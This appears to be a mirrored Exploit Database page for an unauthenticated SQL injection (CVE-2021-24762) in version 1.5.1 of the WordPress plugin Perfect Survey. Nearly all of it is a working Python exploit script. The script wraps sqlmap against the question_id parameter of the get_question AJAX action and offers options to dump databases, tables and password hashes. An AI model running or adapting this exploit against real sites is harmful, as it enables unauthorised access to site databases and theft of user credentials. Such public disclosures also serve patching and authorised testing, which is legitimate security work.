WordPress Plugin Perfect Survey – 1.5.1 – SQLi (Unauthenticated)

• Exploit Database
• 123 阅读

• 作者： Ron Jost
  日期： 2022-02-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50766/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

  # Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated) # Date 18.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.getperfectsurvey.com/ # Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip # Version: < 1.5.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24762 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md   &apos;&apos;&apos; Description: The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection. &apos;&apos;&apos;   banner = &apos;&apos;&apos;   ____ _______ ____ ____ ____ ___ ______________________ _(___)_ (_) (_)(______)_(____) (____)_(____) (___)_(____)(_)(_)(_______)(_____) _(____) (_) (_)(_) (_)(_)________(_) _(_)(_)(_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_ _(_)(_)___(_) _(_) (_)_ (_) (_)(____)(______) _(_)(_)(_)_(_) (_)(______) _(_)(________)_(_)(_____)__(_) (_)___(_) (_)_(_) (_)____ (_)___ (_)__(_) (_)___(_)(_)___(_) (_)(_)___(_)(_)___ (___)(___)(______) (______) (____) (______) (_) (______) (_)(_)(_____)(______) [+] Perfect Survey - SQL Injection [@] Developed by Ron Jost (Hacker5preme)   &apos;&apos;&apos; print(banner)   import argparse from datetime import datetime import os   # User-Input: my_parser = argparse.ArgumentParser(description= &apos;Perfect Survey - SQL-Injection (unauthenticated)&apos;) my_parser.add_argument(&apos;-T&apos;, &apos;--IP&apos;, type=str) my_parser.add_argument(&apos;-P&apos;, &apos;--PORT&apos;, type=str) my_parser.add_argument(&apos;-U&apos;, &apos;--PATH&apos;, type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH   print(&apos;[*] Starting Exploit at: &apos; + str(datetime.now().strftime(&apos;%H:%M:%S&apos;))) print(&apos;[*] Payload for SQL-Injection:&apos;) exploitcode_url = r&apos;sqlmap "http://&apos; + target_ip + &apos;:&apos; + target_port + wp_path + r&apos;wp-admin/admin-ajax.php?action=get_question&question_id=1 *" &apos; print(&apos;Sqlmap options:&apos;) print(&apos; -a, --all Retrieve everything&apos;) print(&apos; -b, --bannerRetrieve DBMS banner&apos;) print(&apos; --current-userRetrieve DBMS current user&apos;) print(&apos; --current-dbRetrieve DBMS current database&apos;) print(&apos; --passwords Enumerate DBMS users password hashes&apos;) print(&apos; --tablesEnumerate DBMS database tables&apos;) print(&apos; --columns Enumerate DBMS database table column&apos;) print(&apos; --schemaEnumerate DBMS schema&apos;) print(&apos; --dumpDump DBMS database table entries&apos;) print(&apos; --dump-allDump all DBMS databases tables entries&apos;) retrieve_mode = input(&apos;Which sqlmap option should be used to retrieve your information? &apos;) exploitcode = exploitcode_url +retrieve_mode + &apos; --answers="follow=Y" --batch -v 0&apos; os.system(exploitcode) print(&apos;Exploit finished at: &apos; + str(datetime.now().strftime(&apos;%H:%M:%S&apos;)))